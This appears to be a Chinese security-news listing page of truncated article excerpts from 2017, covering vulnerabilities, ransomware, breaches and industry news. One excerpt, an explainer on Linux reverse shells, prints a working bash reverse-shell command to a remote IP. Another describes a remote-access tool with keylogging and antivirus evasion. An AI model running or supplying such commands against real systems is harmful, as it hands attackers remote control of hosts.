1、这么说,你想成为一名黑客 2、不错的志向,因为... 3、你需要弄一个很酷的面具,和一件笔挺的西装 4、如果你是一个火辣的女孩、并梳着一个男孩的发型,那就更好了 5、该死,这款发型也相当不错 6、找一个很小很小的墨镜 7、或者蛤蟆镜 8、墨镜对一个黑客来说非常非常的重要,不是吗? 9、想当黑客,你需要至少两台电脑 10、一个黑客可以把任何环境转变成工作室 11、黑客需要有一个非常隐蔽的藏身处,以防警察的抓捕 12、黑客对电脑的内部结构非常的了解 13、IE?NO,真正的黑客使用火狐浏览器 14、真正的黑客的电脑…
E安全3月19日讯 特朗普发布联邦政府预算计划,美国将在2018财年为FBI和司法部增加6100万美元的预算,以更好地追踪恐怖分子通信并打击网络犯罪分子,巩固美国国家安全和执法力度。 这份计划旨在将FBI总体预算增加到2.49亿美元,比2017财年增加3%。,大多数增加的资金将用来帮助执法机构执行调查。 这份报告指出: “FBI将向世界级的特工和情报分析家提供资源,并投资超过6100万美元用于打击恐怖主义、外国情报和网络威胁,意图解决因恶意攻击者使用加密产品和服务带来的公共安全和国家安全风险。” 国防部的预算也将增…
E安全3月19日讯 美国海军上月举办了“黑掉军舰”(Hack-Our-Ship)比赛,邀请美国的黑客专家入侵一艘模拟的海军舰队软件系统。 此次“黑掉军舰”比赛由博思艾伦汉密尔顿控股公司、美国海军研究生院和国防创新试验单位于2月17 至2月19日联合举办。 本次参赛者的挑战项目是:黑进博思艾伦“箱中船”(Boat in a Box),这是一款模拟控制海军舰队的系统而精密设计的软件系统。“箱中船”软件包含海上使用的各种通信接口,包括用来防止碰撞的自动识别系统和气象卫星无线电系统 。 比赛地点设在德克萨斯州奥斯汀的首都工…
在近期美国的“西南偏南”大会上,一部影片的首映引来了不少关注。这是一部纪录片,记录的是美国网络硬盘服务商Megaupload的创始人Kim Dotcom跌宕起伏的人生,并试图从新的角度向观众揭示Kim Dotcom事件背后不为人知的阴谋。 Megaupload创始人Kim Dotcom 生活在中国大陆的我们可能对Megaupload不太了解,但是这家于2005年在香港的公司在美国、欧洲网民心中可是非常出名。类似于现在的网盘服务,Megaupload是一家提供文件云存储和浏览的网站,能支持上传1G大小的文件,保存时间…
人物简介 郭启全,公安部网络安全保卫局总工程师,二级警监,研究员。担任国家物联网专家咨询委委员,军委某部特聘专家,国资委、国家卫计委、商务部、安监总局、食药监总局特聘专家。参加制定《网络安全法》、《治安管理处罚法》、《国家网络安全战略》等国家有关法律政策,主持制定了国家信息安全等级保护和网络安全信息通报一系列政策文件及国家标准。主持完成了多项国家和公安部科研项目,荣立个人一等功,并获得国家科技进步二等奖和多项公安部科技进步奖,出版了30多部计算机应用和网络安全学术编著及大学教材,发表了30多篇学术论文。 …
初见葛军,干净的脸颊清清瘦瘦,坚挺的鼻梁上架着一副细边框眼镜,颇有一些文人墨客的风采,这位虚拟世界中的“教父”,实际生活中的性格却格外腼腆,丝毫意识不到,站在眼前这个有书生气质的年轻人,是原“灰鸽子”远程控制软件的开发者,也是在经历重重考验和磨练后,仍然执着在自己喜爱的互联网领域,为营造安全清朗的网络环境,不断努力向前的奋勇者。“无论在什么时候,我都会在网络安全这个主题上不断探究;不论取得多少成绩,我都不会骄傲自满,因为我的定义里,我始终都是一个普通的‘程序员’,用我所及,奉献所能。” 葛军生活照。本人供图 从…
事件概述 根据国外安全媒体的最新报道,美国军方近日泄漏了一个安全许可审查应用,其中包含有大量安全许可文件。这些机密文件中记录有大量美国政府高层的敏感个人信息,而这些信息将成为外国敌人破坏美国国土安全的一个非常有价值的工具。 高度机密 近日,一个未加密的备份驱动器泄漏了大量美国空军的机密文件,其中包含了高度敏感的空军高管个人文件。安全研究专家经过研究发现,这份文件大小有好几个GB,由于这个备份驱动器没有进行加密保护,而且还接入了互联网,因此任何人都可以访问到这个备份驱动器中的数据。 ZDNet手上拿到的这份文件中包含…
前言 2017年3月14日,也就是两天前,微软补丁日修复了Microsoft Edge 中的多个漏洞。当用户访问攻击者精心构造的网页,最严重的漏洞可能允许远程代码执行。成功利用这些漏洞的攻击者可以控制受影响的系统。其中本篇文章为漏洞发现者对CVE-2017-0012 Microsoft 浏览器欺骗漏洞进行分析。 微软官方公告:https://technet.microsoft.com/zh-cn/library/security/MS17-007 影响版本 Microsoft Edge Internet Explo…
前言 眼下,几乎人人都在使用GitHub。如果您有大量的绿皮书或者对自己的代码非常偏执,那么不妨运行自己的GitHub。支付$ 2500美元,就可以得到一个GitHub企业版,可供10个用户使用一年。实际上,Github企业版就是一个虚拟机,只不过提供了一个功能齐全的GitHub实例而已。尽管有一些边缘的情况下偶尔用到了GitHub.enterprise?调用,但是它运行的是与原始代码库一样的代码库。 所以,让我们干掉它。 代码的反混淆处理 当您下载Github企业版时,将会得到一个VirtualBox镜像,你可以…
前言 防火墙和入侵检测系统(IDS)是任何公司安全方面或组织内网络基础设施的基本核心。防火墙以网络信息为基础过滤流量,而IDS进行的是更深入的研究——考虑并分析在网络中循环的每个数据包的实际数据的内容。 要真正评估网络上的数据包,IDS需要在非常低的级别上理解在特定协议内循环的信息的类型。因此,入侵检测系统(IDS)是分析系统和网络活动,以检测是否有未授权进入和/或恶意活动的活动进程或设备。 市场上的IDS产品琳琅满目。1998年,Ptecek和Newsham演示了如何逃避IDS,他们使用了多种技术,比如重叠she…
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 Bash 这篇文章的起因就是网上给的Bash反弹shell的实现: 1 bash -i >& /dev/tcp/10.0.0.1/8080 …
Fastjson简介 Fastjson是一个Java语言编写的高性能功能完善的JSON库。它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的JSON库。Fastjson接口简单易用,已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。 漏洞概要 2017年3月15日,Fastjson 官方发布安全公告,该公告介绍fastjson在1.2.24以及之前版本存在代码执行漏洞代码执行漏洞,恶意攻击者可利用此漏洞进行远程代码执行,从而进…
SSL安全套接层 SSL安全套接层(Secure Socket Layer)为Netspace所研发,用以保证在Internet上数据传输的完整性和保密性,目前版本为3.0,最新版本为TLS1.2安全传输层协议(Transport Layer Security)。TLS和SSL两者差别极小可以将其理解为SSL的更新版本。 通信过程 SSL介于应用层和网络层之间,位于传输层。应用的数据经过传输层中的SSL进行加密,并增加自己的SSL头,在将加密后的数据传向网络层。 其中具体的通信过程如下: 1. 客户端的浏览器向服务…
央视315晚会曝光了一些人脸识别验证有可能存在漏洞。这种虽然只是简单的机器识别,但实际在网络安全攻防中,机器学习的技术及相关模型已经投入实际运用了。类似这种人脸识别的问题,在网络攻防中防守者在使用,攻击者也在使用,如果攻击者面对机器学习的安全产品及系统,同样有可能利用这样的误判,发起致命的攻击。 央视发布预警称,社交网站比如微信、微博上po的照片有可能被恶意利用,进行人脸识别才能登陆的一些APP,从而存在一些风险。因此,央视提醒即使高科技背后也存在漏洞,人脸识别验证存在一些风险。 没有银弹 攻防进入机器学习对抗时…
在去年年底的时候,安全加报道过 联想手机A319 A6000出现漏洞 俄罗斯杀毒软件厂商发现一批手机固件中包含木马,今年3月10日, 安全公司Check Point在其blog上发表文章称 ,又发现两个大公司的38台安卓移动设备预装有恶意软件。 Checkpoint说手机中的恶意软件是在供应链中添加的 报告显示,各种恶意软件主要由信息窃取程序和拙劣的广告网络组成,这其中也包括所发现的移动勒索软件家族。有意思的是,尽管厂商提供的官方只读存储器(ROM)中并不存在恶意软件,但设备在用户收到前就已经感染了恶意软件。 该安…
卡巴斯基实验室研究员发现,近期一勒索软件家族PetrWrap,利用臭名昭著的Petya勒索软件加密用户数据,并动态修改了软件,控制其执行进程。不过勒索软件Petya也不是什么好东西。 Petya是去年3月出现的,当时立刻引起了研究人员的注意,因为它能够操控主引导记录(MBR),控制机器,而不像其他勒索软件那样加密用户的文件。不久,Petya与Mischa勒索软件狼狈为奸,演变为勒索软件即服务(RaaS)。 PetrWrap勒索软件绑架了Petya勒索软件 最新出现的这款勒索软件名为PetrWrap(Trojan-R…
微软发布了2017年3月安全通告,绿盟科技通告编号:NS17-02,本次通告的内容为是2017年03月14日(PST)安全更新,其中9个严重漏洞,都是远程代码执行漏洞,涉及IE、 Edge、Hyper-V、PDF库、SMB、 Uniscribe 、图形组件、Office、Exchange、IIS、ADFS、DVD Maker、DirectShow、XML Core Services及系统等等。 最容易被攻击的两个, 终于被修复了,大家赶紧安装吧 !安装方法见文末。 Microsoft Windows SMB 服务器…
据外媒报道,日前,谷歌捣毁了一个巨大的 Android 恶意软件家族 Chamois。据这家公司披露,这些恶意软件已经感染了上百万台设备。 Chamois 是一个对 Android 设备展开大范围广告欺诈的恶意软件。谷歌安全软件工程师 Bernhard Grill、Megan Ruthven、Xin Zhao 在官博上指出,他们是在常规广告流量质量评估中发现了 Chamois。 工程师对那些基于 Chamois 开发而出的恶意软件展开了分析,他们发现这些软件能够通过数种途径避开检测并尝试欺诈用户,于是决定采用 Ve…
据外媒报道,全世界排名第一的 ERP 软件公司 SAP 于近日修补了云商务平台 HANA 中的关键漏洞。 此前研究人员表明:SAP 修复的 27 个漏洞中,存在两个关键漏洞。其中一个是:攻击者在不需要经过任何验证的同时,就可以利用漏洞通过 HANA 的用户自助服务元件入侵整个系统;另一个则是:允许攻击者通过假冒系统中的高级用户来提升特权,从而窃取或删除敏感资料。 SAP HANA 是一个内存数据库,其中管理系统主要用于存储、检索和处理核心业务数据。所以,在过去一年中也吸引了越来越多的黑客人员对其进行攻击。 这批漏…
据外媒报道,黑客利用 Apache Struts 2 (Java Web服务器框架) 软件中新发现的漏洞,袭击了加拿大统计局的网站。目前,Candian 政府也证实该局网站已经被黑客入侵和离线超过两天。此外,当局还声称加拿大税务局( CRA ) 网站虽然还没有被黑客入侵,但它存在着和加拿大统计局网站同样的漏洞,因此当局在税收季节的高峰期关闭了该网站。 CRA 发言人帕克斯·萨姆森称,此次事件已经过去了 48 小时,CRA 还在与其他政府部门进行处理,寻求解决方案。CRA 也保证该解决方案会经过严格的测试,尽早恢复在…
据外媒报道,著名理论物理学家史蒂芬·霍金( Stephen Hawking )最近一直在谈论一个主题:人类的未来。 近期,霍金对从地外生命到人工智能(AI)等一些热门话题表达了自己的观点。对于后者,他表示出非常担忧。他并不反对开发人工智能技术,事实上,他曾经说过人工智能可能是我们文明历史上最重大的事件。但是像今天世界上其他许多科学家和思想家一样,霍金担心人工智能的崛起可能带来各种负面的副作用。 他早已就人工智能对中产阶级工作岗位的影响向我们发出了警告,并与特斯拉 CEO 埃隆·马斯克(Elon Musk)一起,呼吁…
前言 欢迎阅读第九份OnionScan报告。这些报告为大家提供最准确和最新的分析来教大家如何在现实世界中使用匿名网络。 在去年一年里,我们制作过一份关于洋葱服务状态的报告。 在这份报告中,我们将对由OnionScan编译的OnionSphere爬虫进行最新的分析。 注意:这项研究里有我们的支持者,我们希望我们在未来还能够继续为大家提供新的见解,研究和技术。 为了帮助我们这样做,请支持我们。 关于OnionScan的一年 在过去一年里,我们写了许多关于匿名,安全和暗网的报告。我们第一次报告包含了对暗网的犯罪评估,计数…
设备年年新,内核永不换。早该被淘汰的Linux内核版本,依然阴魂不散地扎根在各种各样的设备中,驱动着这些设备如同《行尸走肉》的丧尸游荡在世界各地。 Linux内核安全漏洞是新闻头条常客。最近又有一个隐身十年之久的严重内核漏洞被曝光了。但是,这到底代表着什么现实意义呢?为什么Linux内核安全很重要?老旧内核上的漏洞在众多设备中苟延残喘到底有什么影响? Linux是操作系统的王者 毋庸置疑,Linux系操作系统的流行度无人能出其右:3/4的IoT设备运行Linux;2/3的在线服务器用Linux;70%的平板基于安卓…
Stitch是一款基于Python的跨平台远程管理工具。由于其跨平台性,Stitch允许用户针对Windows, Mac OSX 或 Linux分别定制不同的payload。你可以根据自己的需要,来选择绑定的IP及监听端口。你还可以设置是否在目标系统启动时,向你发送系统信息邮件,以及是否开启键盘记录。 特点: 跨平台支持: 文件及命令自动执行 防病毒检测 可以打开或关闭显示屏监视器 隐藏或显示文件和目录 查看或修改hosts文件 查看系统所有环境变量 键盘记录器具有查看状态,启动,停止和将日志转储到主机系统的选项 …
据外媒报道,近日又发生一起女星私照大规模泄露事件,照片目前正在美国知名论坛4chan和Reddit上疯传,中招的女星包括艾玛·沃森(Emma Watson)、阿曼达·塞弗里德(Amanda Seyfried)等人。 据悉,从周二开始这些隐私照片便开始在网络上疯传,有网友爆料,艾玛·沃森泄露的私照多达上百张,部分照片含有成人内容,相关话题引发网友热议。未来几天可能会有更多女星隐私照片泄漏,此次泄漏事件才仅仅拉开“The Fappening 2.0”的序幕。 这不禁让人联想到2014年发生的“好莱坞艳照门(The Fa…